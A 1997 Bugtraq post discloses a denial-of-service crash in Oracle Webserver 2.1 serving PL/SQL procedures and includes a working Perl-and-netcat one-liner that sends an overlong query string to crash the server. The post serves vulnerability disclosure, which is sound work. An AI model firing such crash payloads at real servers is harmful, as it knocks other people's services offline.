DoS against Oracle Webserver 2.1 with PL/SQL stored procedures

Simon Josefsson (jas@PDC.KTH.SE)
Wed, 23 Jul 1997 00:15:31 +0200

Fellow bugtraqers, I stumbled over this tonight. It's a DoS attack
against an Oracle Webserver 2.1 that serves PL/SQL stored procedures.

The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).

I'm sorry if this is old news (but I'd appreciate it if someone told me
if there is a bugfix somewhere).

(PL/SQL is, simply put, a scripting language within the Oracle database)

---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
#       prg <host> <port> <path>
#
# example:
#       # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
---

S.